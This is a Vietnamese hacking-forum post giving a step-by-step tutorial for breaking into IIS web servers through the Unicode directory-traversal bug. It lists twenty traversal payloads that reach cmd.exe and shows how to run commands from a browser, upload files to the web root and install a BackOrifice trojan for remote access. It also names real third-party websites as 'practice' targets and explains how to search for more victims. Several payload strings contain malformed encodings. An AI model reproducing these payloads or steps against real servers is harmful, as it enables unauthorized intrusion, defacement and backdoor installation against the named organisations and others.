Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 Hack IIS server bằng UNICODE bug :

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Hack IIS server bằng UNICODE bug  : Empty
Bài gửiTiêu đề: Hack IIS server bằng UNICODE bug :   Hack IIS server bằng UNICODE bug  : EmptySat Oct 23, 2010 5:28 pm

Giới thiệu :
• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách hack IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !
Hack IIS server bằng UNICODE bug :
• Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server cũng như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu website tất cả đã được patch Smile
• Bắt đầu tiến hành :
1. Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn đánh : telnet . Rồi chọn
Host: diachitrangweb.com | Port: 80 | Term type: vt100
Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server không ?
2. Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M) đownload ở http://www.softseek.com/ ) và file unicode (download ở đây : unicode.pl )
3. Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl www.diachiwebsite.com:80

Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

4. Ví dụ nó scan ra được bug 15 thì ở URL của Browser bạn gõ :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+

Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh DOS cổ lỗ sĩ thông thường
Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :
http://www.diachitrangweb.com/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\

Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như DOS Smile)
5. Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục: c:\inetpub\wwwroot
bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ cứng - đownload ở đây - upload.zip)
cỏ của sổ MS-DOS promt bạn gõ :
perl cgidecoderloader target:80 'f:\inetpub\wwwroot'
Sau khi qua' trình hoàn thành, ở browser bạn đánh :
http://www.diachitrangweb.com/upload.asp rồi upload thứ gì ban muốn (Lời khuyên : upload 1 trojan backorffice để mở port để sau này ban có thể Remote Access đươc.
6. Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) : http://www.iwss.net/ http://www.colorworksinc.com/ http://www.ewatchanddiamond.com/ http://www.sintaks.com/ http://www.electroid.com/ http://www.aspcart.com/ http://www.cfaluminum.com/ http://www.thecapitalgroup.cc/ http://www.kristan-sp.si/ http://www.parrotnetwork.com/ http://www.enjoyusa.com/ http://www.activewebsystems.co.uk/ http://www.safeteefirst.com/ http://www.xtendafork.com/ http://vault.kupinet.com/ http://home.socal.rr.com/ .............
o Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack , đay là một thủ thuât dơn giản : ban vào trang http://www.av.com/ rồi search với thuât ngữ sau : "powered by IIS"
Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi Smile)
Về Đầu Trang Go down
 
Hack IIS server bằng UNICODE bug :
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Bật ( tắt ) audit record bằng auditpol (for Server 2k)
» Ẩn IP bằng Stealther
» Hack ICQ bằng C :
» Đổi passAdmin bằng VB :
» DoS bằng Python

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến